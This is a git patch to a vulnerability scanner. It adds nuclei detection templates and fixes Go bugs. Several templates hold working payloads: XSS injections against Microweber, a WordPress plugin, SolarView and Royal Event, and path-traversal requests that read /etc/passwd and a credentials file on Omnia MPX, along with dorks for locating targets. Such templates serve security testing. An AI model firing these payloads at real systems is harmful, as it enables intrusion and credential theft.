From b5403161b9f38f788563e33985173046cf9cd6b5 Mon Sep 17 00:00:00 2001
From: hktalent <18223385+hktalent@users.noreply.github.com>
Date: Thu, 4 Aug 2022 10:16:23 +0800
Subject: [PATCH] =?UTF-8?q?1=E3=80=81up=20PoCs=202=E3=80=81fixed=20filefuz?=
=?UTF-8?q?z=20TestIs404=20bug=203=E3=80=81fixed=20nuclei=20hang=20bug=20?=
=?UTF-8?q?=202022-08-04?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
config/nuclei-templates/.new-additions | 101 +++++++-----------
.../cves/2022/CVE-2022-0921.yaml | 2 +-
.../cves/2022/CVE-2022-0954.yaml | 57 ++++++++++
.../cves/2022/CVE-2022-1906.yaml | 39 +++++++
.../dns/cname-service-detection.yaml | 40 -------
.../exposed-panels/jamf-setup-assistant.yaml | 25 +++++
.../exposures/configs/symfony-profiler.yaml | 12 ++-
.../misconfiguration/symfony-debug.yaml | 35 ++++++
.../jira/jira-service-desk-signup.yaml | 23 ----
.../vulnerabilities/other/omnia-mpx-lfi.yaml | 35 ++++++
.../other/solarview-compact-xss.yaml | 33 ++++++
.../royalevent/royalevent-management-xss.yaml | 72 +++++++++++++
.../royalevent/royalevent-stored-xss.yaml | 32 ++++++
lib/util/config.go | 23 ++--
lib/util/db.go | 5 +
lib/util/kvDb.go | 1 +
.../nuclei_Yaml/nclruner/runner/runner.go | 61 +++++------
projectdiscovery/nuclei_Yaml/nuclei_yaml.go | 16 +--
.../nuclei/v2/pkg/protocols/http/request.go | 4 +-
19 files changed, 441 insertions(+), 175 deletions(-)
create mode 100644 config/nuclei-templates/cves/2022/CVE-2022-0954.yaml
create mode 100644 config/nuclei-templates/cves/2022/CVE-2022-1906.yaml
delete mode 100644 config/nuclei-templates/dns/cname-service-detection.yaml
create mode 100644 config/nuclei-templates/exposed-panels/jamf-setup-assistant.yaml
create mode 100644 config/nuclei-templates/misconfiguration/symfony-debug.yaml
delete mode 100644 config/nuclei-templates/vulnerabilities/jira/jira-service-desk-signup.yaml
create mode 100644 config/nuclei-templates/vulnerabilities/other/omnia-mpx-lfi.yaml
create mode 100644 config/nuclei-templates/vulnerabilities/other/solarview-compact-xss.yaml
create mode 100644 config/nuclei-templates/vulnerabilities/royalevent/royalevent-management-xss.yaml
create mode 100644 config/nuclei-templates/vulnerabilities/royalevent/royalevent-stored-xss.yaml
diff --git a/config/nuclei-templates/.new-additions b/config/nuclei-templates/.new-additions
index 53c5ed1c7..0114a9a66 100644
--- a/config/nuclei-templates/.new-additions
+++ b/config/nuclei-templates/.new-additions
@@ -1,61 +1,40 @@
-cves/2015/CVE-2015-4666.yaml
-cves/2018/CVE-2018-1000856.yaml
-cves/2018/CVE-2018-19136.yaml
-cves/2018/CVE-2018-19137.yaml
-cves/2018/CVE-2018-19751.yaml
-cves/2018/CVE-2018-19752.yaml
-cves/2018/CVE-2018-19892.yaml
-cves/2019/CVE-2019-9922.yaml
-cves/2021/CVE-2021-36450.yaml
-cves/2022/CVE-2022-0656.yaml
-cves/2022/CVE-2022-35416.yaml
-exposed-panels/claris-filemaker-webdirect.yaml
-exposed-panels/honeywell-xl-web-controller.yaml
-exposed-panels/icewarp-panel-detect.yaml
-exposed-panels/kafka-manager-panel.yaml
-exposed-panels/noescape-login.yaml
-exposed-panels/rustici-content-controller.yaml
-exposed-panels/smartping-dashboard.yaml
-exposed-panels/sonicwall-analyzer-login.yaml
-exposed-panels/tembosocial-panel.yaml
-exposed-panels/tenda-web-master.yaml
-exposed-panels/tiny-file-manager.yaml
-exposed-panels/veeam-backup-gcp.yaml
-exposed-panels/vmware-carbon-black-edr.yaml
-exposed-panels/vmware-cloud-availability.yaml
-exposed-panels/vmware-cloud-director.yaml
-exposed-panels/vmware-ftp-server.yaml
-exposed-panels/vmware-horizon-daas.yaml
-exposed-panels/vmware-vcenter-converter-standalone.yaml
-exposed-panels/vmware-vcloud-director.yaml
-exposed-panels/web-file-manager.yaml
-exposures/configs/config-rb.yaml
-exposures/configs/gcloud-config-default.yaml
-exposures/configs/phpstan-config.yaml
-exposures/configs/wgetrc-config.yaml
-exposures/files/composer-auth-json.yaml
-exposures/files/credentials-json.yaml
-exposures/files/environment-rb.yaml
-exposures/files/gcloud-access-token.yaml
-exposures/files/gcloud-credentials.yaml
-exposures/files/get-access-token-json.yaml
-exposures/files/google-api-private-key.yaml
-exposures/files/google-services-json.yaml
-exposures/files/jsapi-ticket-json.yaml
-exposures/files/npm-cli-metrics-json.yaml
-exposures/files/oauth-credentials-json.yaml
-exposures/files/secret-token-rb.yaml
-exposures/files/service-account-credentials.yaml
-exposures/files/symfony-properties-ini.yaml
-exposures/files/token-info-json.yaml
-exposures/files/token-json.yaml
-exposures/files/wget-hsts-list-exposure.yaml
-exposures/files/ws-ftp-ini.yaml
-exposures/logs/event-debug-server-status.yaml
-exposures/logs/git-logs-exposure.yaml
-technologies/default-page-azure-container.yaml
-technologies/default-parallels-plesk.yaml
-technologies/json-server.yaml
-technologies/samsung-smarttv-debug.yaml
-vulnerabilities/other/opennms-log4j-jndi-rce.yaml
-vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml
+cves/2018/CVE-2018-1000671.yaml
+cves/2020/CVE-2020-13405.yaml
+cves/2020/CVE-2020-9043.yaml
+cves/2022/CVE-2022-0870.yaml
+cves/2022/CVE-2022-0921.yaml
+cves/2022/CVE-2022-0952.yaml
+cves/2022/CVE-2022-0963.yaml
+cves/2022/CVE-2022-1386.yaml
+cves/2022/CVE-2022-1937.yaml
+cves/2022/CVE-2022-2486.yaml
+cves/2022/CVE-2022-2487.yaml
+cves/2022/CVE-2022-2488.yaml
+cves/2022/CVE-2022-30073.yaml
+cves/2022/CVE-2022-34049.yaml
+exposed-panels/goanywhere-mft-login.yaml
+exposed-panels/mailwatch-login.yaml
+exposed-panels/scriptcase/scriptcase-panel.yaml
+exposed-panels/scriptcase/scriptcase-prod-login.yaml
+exposures/apis/drupal-jsonapi-user-listing.yaml
+misconfiguration/springboot/springboot-caches.yaml
+misconfiguration/springboot/springboot-flyway.yaml
+misconfiguration/springboot/springboot-scheduledtasks.yaml
+technologies/nextcloud-owncloud-detect.yaml
+token-spray/api-clickup.yaml
+token-spray/api-clockify.yaml
+token-spray/api-cloudconvert.yaml
+token-spray/api-codestats.yaml
+token-spray/api-craftmypdf.yaml
+token-spray/api-flowdash.yaml
+token-spray/api-html2pdf.yaml
+token-spray/api-monday.yaml
+token-spray/api-pdflayer.yaml
+vulnerabilities/backdoor/jexboss-backdoor.yaml
+vulnerabilities/jira/jira-servicedesk-signup.yaml
+vulnerabilities/other/cvms-sqli.yaml
+vulnerabilities/other/loancms-sqli.yaml
+vulnerabilities/other/weiphp-sql-injection.yaml
+vulnerabilities/other/zms-sqli.yaml
+vulnerabilities/other/zzcms-xss.yaml
+vulnerabilities/wordpress/analytify-plugin-xss.yaml
diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0921.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0921.yaml
index cd4e13baa..ec2424bea 100644
--- a/config/nuclei-templates/cves/2022/CVE-2022-0921.yaml
+++ b/config/nuclei-templates/cves/2022/CVE-2022-0921.yaml
@@ -17,7 +17,7 @@ info:
cve-id: CVE-2022-0954
cwe-id: CWE-79
metadata:
- verified: "true"
+ verified: true
tags: cve,cve2022,xss,microweber
requests:
diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0954.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0954.yaml
new file mode 100644
index 000000000..cd4e13baa
--- /dev/null
+++ b/config/nuclei-templates/cves/2022/CVE-2022-0954.yaml
@@ -0,0 +1,57 @@
+id: CVE-2022-0954
+
+info:
+ name: Microweber - Cross-site Scripting
+ author: amit-jd
+ severity: medium
+ description: |
+ Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop's Other Settings, Shop's Autorespond E-mail Settings and Shops' Payments Methods in GitHub repository microweber/microweber prior to 1.2.11.
+ reference:
+ - https://github.com/advisories/GHSA-8c76-mxv5-w4g8
+ - https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/
+ - https://github.com/microweber/microweber/commit/955471c27e671c49e4b012e3b120b004082ac3f7
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-0954
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2022-0954
+ cwe-id: CWE-79
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,xss,microweber
+
+requests:
+ - raw:
+ - |
+ POST /api/user_login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ username={{username}}&password={{password}}
+
+ - |
+ POST /api/save_option HTTP/2
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ Referer: {{BaseURL}}/admin/view:shop/action:options
+
+ option_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother
+
+ - |
+ POST /module/ HTTP/2
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ Referer: {{BaseURL}}/admin/view:shop/action:options
+
+ module=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B
+
+ cookie-reuse: true
+ req-condition: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body_2,"true")'
+ - contains(body_3,'\">![](\"x\")
\" placeholder=\"Use default')
+ - 'contains(all_headers_3,"text/html")'
+ - 'status_code_3==200'
+ condition: and
diff --git a/config/nuclei-templates/cves/2022/CVE-2022-1906.yaml b/config/nuclei-templates/cves/2022/CVE-2022-1906.yaml
new file mode 100644
index 000000000..dd5479bbf
--- /dev/null
+++ b/config/nuclei-templates/cves/2022/CVE-2022-1906.yaml
@@ -0,0 +1,39 @@
+id: CVE-2022-1906
+
+info:
+ name: Copyright Proof <= 4.16 - Reflected Cross-Site-Scripting
+ author: random-robbie
+ severity: medium
+ description: |
+ The plugin does not sanitise and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users, leading to a Reflected Cross-Site Scripting when a specific setting is enabled.
+ reference:
+ - https://wpscan.com/vulnerability/af4f459e-e60b-4384-aad9-0dc18aa3b338
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-1906
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1906
+ metadata:
+ verified: true
+ google-dork: inurl:/wp-content/plugins/digiproveblog
+ tags: cve,cve2022,wordpress,xss,wp-plugin,wp
+
+requests:
+ - raw:
+ - |
+ GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "got message "
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/config/nuclei-templates/dns/cname-service-detection.yaml b/config/nuclei-templates/dns/cname-service-detection.yaml
deleted file mode 100644
index 4a441a0b4..000000000
--- a/config/nuclei-templates/dns/cname-service-detection.yaml
+++ /dev/null
@@ -1,40 +0,0 @@
-id: cname-service-detection
-
-info:
- name: CNAME Service Detection
- author: pdteam
- severity: info
- description: A CNAME service was detected.
- reference:
- - https://ns1.com/resources/cname
- classification:
- cwe-id: CWE-200
- tags: dns,service
-
-dns:
- - name: "{{FQDN}}"
- type: CNAME
-
- matchers-condition: or
- matchers:
- - type: word
- name: zendesk
- words:
- - "zendesk.com"
-
- - type: word
- name: github
- words:
- - "github.io"
-
- - type: word
- name: announcekit
- words:
- - "cname.announcekit.app"
-
- - type: word
- name: wix
- words:
- - "wixdns.net"
-
-# Enhanced by mp on 2022/03/13
diff --git a/config/nuclei-templates/exposed-panels/jamf-setup-assistant.yaml b/config/nuclei-templates/exposed-panels/jamf-setup-assistant.yaml
new file mode 100644
index 000000000..ca663bdae
--- /dev/null
+++ b/config/nuclei-templates/exposed-panels/jamf-setup-assistant.yaml
@@ -0,0 +1,25 @@
+id: jamf-setup-assistant
+
+info:
+ name: Jamf Pro Setup Assistant
+ author: ritikchaddha
+ severity: info
+ metadata:
+ verified: true
+ shodan-query: http.html:"Jamf Pro Setup"
+ tags: jamf,setup,panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/setupAssistant.html"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Jamf Pro Setup Assistant"
+
+ - type: status
+ status:
+ - 200
diff --git a/config/nuclei-templates/exposures/configs/symfony-profiler.yaml b/config/nuclei-templates/exposures/configs/symfony-profiler.yaml
index 980d14936..f02bf7c59 100644
--- a/config/nuclei-templates/exposures/configs/symfony-profiler.yaml
+++ b/config/nuclei-templates/exposures/configs/symfony-profiler.yaml
@@ -4,16 +4,20 @@ info:
name: Symfony Profiler
author: pdteam
severity: high
+ metadata:
+ verified: true
+ shodan-query: http.html:"symfony Profiler"
tags: config,exposure,symfony
requests:
- method: GET
path:
- "{{BaseURL}}/_profiler/empty/search/results?limit=10"
+ - "{{BaseURL}}/app_dev.php/_profiler/empty/search/results?limit=10"
+
+ stop-at-first-match: true
matchers:
- type: word
- words:
- - "Symfony Profiler"
- - "symfony/profiler/"
- condition: and
part: body
+ words:
+ - "Symfony Profiler"
diff --git a/config/nuclei-templates/misconfiguration/symfony-debug.yaml b/config/nuclei-templates/misconfiguration/symfony-debug.yaml
new file mode 100644
index 000000000..bdc1ec3bf
--- /dev/null
+++ b/config/nuclei-templates/misconfiguration/symfony-debug.yaml
@@ -0,0 +1,35 @@
+id: symfony-debug
+
+info:
+ name: Symfony Debug Mode
+ author: organiccrap,pdteam
+ severity: high
+ description: A Symfony installations 'debug' interface is enabled, allowing the disclosure and possible execution of arbitrary code.
+ reference:
+ - https://github.com/synacktiv/eos
+ metadata:
+ verified: true
+ shodan-query: http.html:"symfony Profiler"
+ tags: symfony,debug
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: or
+ matchers:
+ - type: word
+ part: header
+ words:
+ - 'x-debug-token-link:'
+ - '/_profiler/'
+ condition: and
+ case-insensitive: true
+
+ - type: word
+ part: body
+ words:
+ - 'debug mode is enabled.'
+
+# Enhanced by mp on 2022/04/12
diff --git a/config/nuclei-templates/vulnerabilities/jira/jira-service-desk-signup.yaml b/config/nuclei-templates/vulnerabilities/jira/jira-service-desk-signup.yaml
deleted file mode 100644
index 1cfce39b4..000000000
--- a/config/nuclei-templates/vulnerabilities/jira/jira-service-desk-signup.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-id: jira-service-desk-signup
-
-info:
- name: Jira Service Desk Signup
- author: TechbrunchFR
- severity: medium
- tags: jira,atlassian,service
-
-requests:
- - method: POST
- path:
- - "{{BaseURL}}/servicedesk/customer/user/signup"
- headers:
- Content-Type: application/json
- body: '{"email":"invalid","signUpContext":{},"secondaryEmail":"","usingNewUi":true}'
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "signup.validation.errors"
- - type: status
- status:
- - 400
diff --git a/config/nuclei-templates/vulnerabilities/other/omnia-mpx-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/omnia-mpx-lfi.yaml
new file mode 100644
index 000000000..b6c786991
--- /dev/null
+++ b/config/nuclei-templates/vulnerabilities/other/omnia-mpx-lfi.yaml
@@ -0,0 +1,35 @@
+id: omnia-mpx-lfi
+
+info:
+ name: Omnia MPX 1.5.0+r1 - Path Traversal
+ author: arafatansari,ritikchaddha
+ severity: high
+ description: |
+ Omnia MPX 1.5.0+r1 is vulnerable to Path Traversal.
+ reference:
+ - https://www.exploit-db.com/exploits/50996
+ metadata:
+ verified: true
+ shodan-query: http.html:"Omnia MPX"
+ tags: omnia,mpx,lfi,traversal
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd"
+ - "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"
+
+ stop-at-first-match: true
+ matchers-condition: or
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: word
+ part: body
+ words:
+ - '"username":'
+ - '"password":'
+ - '"id":'
+ condition: and
diff --git a/config/nuclei-templates/vulnerabilities/other/solarview-compact-xss.yaml b/config/nuclei-templates/vulnerabilities/other/solarview-compact-xss.yaml
new file mode 100644
index 000000000..1ef86e157
--- /dev/null
+++ b/config/nuclei-templates/vulnerabilities/other/solarview-compact-xss.yaml
@@ -0,0 +1,33 @@
+id: solarview-compact-xss
+
+info:
+ name: SolarView Compact 6.00 - Cross-Site Scripting(XSS)
+ author: ritikchaddha
+ severity: medium
+ description: |
+ SolarView Compact v6.0 is vulnerable to cross-site scripting (XSS) vulnerability via `fname` at /Solar_Image.php.
+ metadata:
+ verified: true
+ shodan-query: http.html:"SolarView Compact"
+ tags: xss,solarview
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/Solar_Image.php?mode=resize&fname=test%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'value="test">">'
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
diff --git a/config/nuclei-templates/vulnerabilities/royalevent/royalevent-management-xss.yaml b/config/nuclei-templates/vulnerabilities/royalevent/royalevent-management-xss.yaml
new file mode 100644
index 000000000..dd51cf3f6
--- /dev/null
+++ b/config/nuclei-templates/vulnerabilities/royalevent/royalevent-management-xss.yaml
@@ -0,0 +1,72 @@
+id: royalevent-management-xss
+
+info:
+ name: Royal Event - Cross-Site Scripting(XSS)
+ author: ritikchaddha
+ severity: medium
+ description: |
+ Detects an XSS vulnerability in Royal Event System
+ reference:
+ - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
+ metadata:
+ verified: true
+ tags: xss,authenticated,cms,royalevent
+
+requests:
+ - raw:
+ - |
+ POST /royal_event/ HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 353
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD
+
+ ------WebKitFormBoundaryCSxQll1eihcqgIgD
+ Content-Disposition: form-data; name="username"
+
+ {{username}}
+ ------WebKitFormBoundaryCSxQll1eihcqgIgD
+ Content-Disposition: form-data; name="password"
+
+ {{password}}
+ ------WebKitFormBoundaryCSxQll1eihcqgIgD
+ Content-Disposition: form-data; name="login"
+
+
+ ------WebKitFormBoundaryCSxQll1eihcqgIgD--
+
+ - |
+ POST /royal_event/btndates_report.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD
+
+ ------WebKitFormBoundaryFboH5ITu7DsGIGrD
+ Content-Disposition: form-data; name="todate"
+
+ 2022-12-22
+ ------WebKitFormBoundaryFboH5ITu7DsGIGrD
+ Content-Disposition: form-data; name="search"
+
+ 3
+ ------WebKitFormBoundaryFboH5ITu7DsGIGrD
+ Content-Disposition: form-data; name="fromdate"
+
+ 2022-06-22
+ ------WebKitFormBoundaryFboH5ITu7DsGIGrD--
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ - "Report from "
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/config/nuclei-templates/vulnerabilities/royalevent/royalevent-stored-xss.yaml b/config/nuclei-templates/vulnerabilities/royalevent/royalevent-stored-xss.yaml
new file mode 100644
index 000000000..601e0fc7a
--- /dev/null
+++ b/config/nuclei-templates/vulnerabilities/royalevent/royalevent-stored-xss.yaml
@@ -0,0 +1,32 @@
+id: royalevent-stored-xss
+
+info:
+ name: Royale Event - Stored Cross-site Scripting (Unauthenticated)
+ author: ritikchaddha
+ severity: high
+ description: |
+ Detects an XSS vulnerability in Royal Event System
+ reference:
+ - https://packetstormsecurity.com/files/166479/Royale-Event-Management-System-1.0-Cross-Site-Scripting.html
+ - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
+ metadata:
+ verified: true
+ tags: xss,unauthenticated,cms,royalevent
+
+requests:
+ - raw:
+ - |
+ POST /royal_event/companyprofile.php HTTP/1.1
+ Host: {{Hostname}}
+
+ companyname=%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E®no=test&companyaddress=&companyemail=&country=India&mobilenumber=1234567899&submit=
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'value=">" >'
+
+ - type: status
+ status:
+ - 302
diff --git a/lib/util/config.go b/lib/util/config.go
index 7c0b9d92b..ff485bb15 100644
--- a/lib/util/config.go
+++ b/lib/util/config.go
@@ -323,6 +323,10 @@ func Init1(config *embed.FS) {
log.Println("init config files is over .")
}
+func Mkdirs(s string) {
+ os.MkdirAll(s, os.ModePerm)
+}
+
// 获取 Sha1
func GetSha1(a ...interface{}) string {
h := sha1.New()
@@ -377,11 +381,16 @@ func TestIs404(szUrl string) (r01 *Response, err error, ok bool) {
key := "TestIs404" + szUrl
x1 := noRpt.Get(key)
if nil != x1 {
- a1 := x1.Value().([]interface{})
- r01 = a1[0].(*Response)
- err = a1[1].(error)
- ok = a1[2].(bool)
- return r01, err, ok
+ if a1, ok := x1.Value().([]interface{}); ok {
+ r01 = a1[0].(*Response)
+ if nil == a1[1] {
+ err = nil
+ } else {
+ err = a1[1].(error)
+ }
+ ok = a1[2].(bool)
+ return r01, err, ok
+ }
}
r01, err = HttpRequset(szUrl+Abs404, "GET", "", false, nil)
@@ -391,13 +400,15 @@ func TestIs404(szUrl string) (r01 *Response, err error, ok bool) {
}
func TestIs404Page(szUrl string) (page *Page, r01 *Response, err error, ok bool) {
r01, err, ok = TestIs404(szUrl)
- page = &Page{Url: &szUrl}
+ page = &Page{Url: &szUrl, Resqonse: r01}
if nil != r01 {
+ szTitle := ""
page.Is302 = r01.StatusCode == 302
page.Is403 = r01.StatusCode == 403
page.IsBackUpPage = false
page.StatusCode = r01.StatusCode
page.Resqonse = r01
+ page.Title = &szTitle
page.BodyLen = len([]byte(r01.Body))
page.BodyStr = &r01.Body
page.LocationUrl = &r01.Location
diff --git a/lib/util/db.go b/lib/util/db.go
index 0d8abd87e..398cf34ef 100644
--- a/lib/util/db.go
+++ b/lib/util/db.go
@@ -6,6 +6,7 @@ import (
"gorm.io/gorm/logger"
"log"
"os"
+ "strings"
)
var dbCC *gorm.DB
@@ -43,6 +44,10 @@ func GetDb(dst ...interface{}) *gorm.DB {
if "" != s1 {
szDf = s1
}
+ s1 = szDf[0:strings.LastIndex(szDf, "/")]
+ if "" != s1 {
+ Mkdirs(s1)
+ }
log.Println("DbName ", szDf)
xx01 := sqlite.Open("file:" + szDf + ".db?cache=shared&mode=rwc&_journal_mode=WAL&Synchronous=Off&temp_store=memory&mmap_size=30000000000")
db, err := gorm.Open(xx01, &gorm.Config{Logger: logger.Default.LogMode(logger.Silent)})
diff --git a/lib/util/kvDb.go b/lib/util/kvDb.go
index 1868afd60..a0da1ada7 100644
--- a/lib/util/kvDb.go
+++ b/lib/util/kvDb.go
@@ -24,6 +24,7 @@ func NewKvDbOp() *KvDbOp {
if "" != s1 {
CacheName11 = s1
}
+ Mkdirs(CacheName11)
Cache1.Init(CacheName11)
return Cache1
}
diff --git a/projectdiscovery/nuclei_Yaml/nclruner/runner/runner.go b/projectdiscovery/nuclei_Yaml/nclruner/runner/runner.go
index 123d36171..d56fa127d 100644
--- a/projectdiscovery/nuclei_Yaml/nclruner/runner/runner.go
+++ b/projectdiscovery/nuclei_Yaml/nclruner/runner/runner.go
@@ -400,38 +400,6 @@ func (r *Runner) RunEnumeration() error {
return errors.Wrap(err, "could not load templates from config")
}
// 确保释放资源,多实例运行优化
- defer func() {
- var results *atomic.Bool
- if r.options.AutomaticScan {
- if results, err = r.executeSmartWorkflowInput(executerOpts, store, engine); err != nil {
- return
- }
-
- } else {
- if results, err = r.executeTemplatesInput(store, engine); err != nil {
- return
- }
- }
-
- if r.interactsh != nil {
- matched := r.interactsh.Close()
- if matched {
- results.CAS(false, true)
- }
- }
- r.progress.Stop()
-
- if r.issuesClient != nil {
- r.issuesClient.Close()
- }
-
- if !results.Load() {
- gologger.Info().Msgf("No results found. Better luck next time!")
- }
- if r.browser != nil {
- r.browser.Close()
- }
- }()
if r.options.Validate {
if err := store.ValidateTemplates(); err != nil {
return err
@@ -446,7 +414,36 @@ func (r *Runner) RunEnumeration() error {
store.Load()
r.displayExecutionInfo(store)
+ var results *atomic.Bool
+ if r.options.AutomaticScan {
+ if results, err = r.executeSmartWorkflowInput(executerOpts, store, engine); err != nil {
+ return err
+ }
+
+ } else {
+ if results, err = r.executeTemplatesInput(store, engine); err != nil {
+ return err
+ }
+ }
+ if r.interactsh != nil {
+ matched := r.interactsh.Close()
+ if matched {
+ results.CAS(false, true)
+ }
+ }
+ r.progress.Stop()
+
+ if r.issuesClient != nil {
+ r.issuesClient.Close()
+ }
+
+ if !results.Load() {
+ gologger.Info().Msgf("No results found. Better luck next time!")
+ }
+ if r.browser != nil {
+ r.browser.Close()
+ }
return err
}
diff --git a/projectdiscovery/nuclei_Yaml/nuclei_yaml.go b/projectdiscovery/nuclei_Yaml/nuclei_yaml.go
index cf19dced3..650fc11be 100644
--- a/projectdiscovery/nuclei_Yaml/nuclei_yaml.go
+++ b/projectdiscovery/nuclei_Yaml/nuclei_yaml.go
@@ -24,7 +24,13 @@ var (
)
// 优化,不是http协议的就不走http,提高效率
-func RunNuclei(buf *bytes.Buffer, xx chan bool, oOpts *map[string]interface{}, outNuclei chan<- *runner2.Runner) {
+// 多实例运行还是存在问题,会出现nuclei 挂起的问题
+func RunNucleiP(buf *bytes.Buffer, xx chan bool, oOpts *map[string]interface{}, outNuclei chan<- *runner2.Runner) {
+ if !util.GetValAsBool("enableNuclei") {
+ outNuclei <- nil
+ xx <- true
+ return
+ }
a := strings.Split(strings.TrimSpace(buf.String()), "\n")
var aHttp, noHttp []string
buf.Reset()
@@ -110,15 +116,11 @@ func RunNuclei(buf *bytes.Buffer, xx chan bool, oOpts *map[string]interface{}, o
var someMapMutex = sync.RWMutex{}
-func RunNucleiP(buf *bytes.Buffer, xx chan bool, oOpts *map[string]interface{}, outNuclei chan<- *runner2.Runner) {
+func RunNuclei(buf *bytes.Buffer, xx chan bool, oOpts *map[string]interface{}, outNuclei chan<- *runner2.Runner) {
options := &types.Options{}
defer func() {
xx <- true
}()
- if !util.GetValAsBool("enableNuclei") {
- outNuclei <- nil
- return
- }
// json 控制参数
options = util.ParseOption[types.Options]("nuclei", options)
if err := runner2.ConfigureOptions(); err != nil {
@@ -408,7 +410,7 @@ func readConfig(options *types.Options) {
options.UpdateTemplates = false
options.TemplatesDirectory = pwd + "/config/nuclei-templates"
// 嵌入式集成私人版本nuclei-templates 共3744个YAML POC
- if "true" == util.GetVal("enablEmbedYaml") {
+ if util.GetValAsBool("enablEmbedYaml") {
options.Templates = []string{pwd + "/config/nuclei-templates"}
options.NoUpdateTemplates = true
} else {
diff --git a/vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go b/vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go
index 007c4dfea..5d981d1de 100644
--- a/vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go
+++ b/vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go
@@ -346,7 +346,7 @@ func (request *Request) ExecuteWithResults(reqURL string, dynamicValues, previou
const drainReqSize = int64(8 * 1024)
var errStopExecution = errors.New("stop execution due to unresolved variables")
-
+var someMapMutex = sync.RWMutex{}
// executeRequest executes the actual generated request and returns error if occurred
func (request *Request) executeRequest(reqURL string, generatedRequest *generatedRequest, previousEvent output.InternalEvent, hasInteractMatchers bool, callback protocols.OutputEventCallback, requestCount int) error {
request.setCustomHeaders(generatedRequest)
@@ -582,6 +582,7 @@ func (request *Request) executeRequest(reqURL string, generatedRequest *generate
if request.options.Interactsh != nil {
request.options.Interactsh.MakePlaceholders(generatedRequest.interactshURLs, outputEvent)
}
+ someMapMutex.Lock()
for k, v := range previousEvent {
finalEvent[k] = v
}
@@ -597,6 +598,7 @@ func (request *Request) executeRequest(reqURL string, generatedRequest *generate
finalEvent[key] = v
}
}
+ someMapMutex.Unlock()
// prune signature internal values if any
request.pruneSignatureInternalValues(generatedRequest.meta)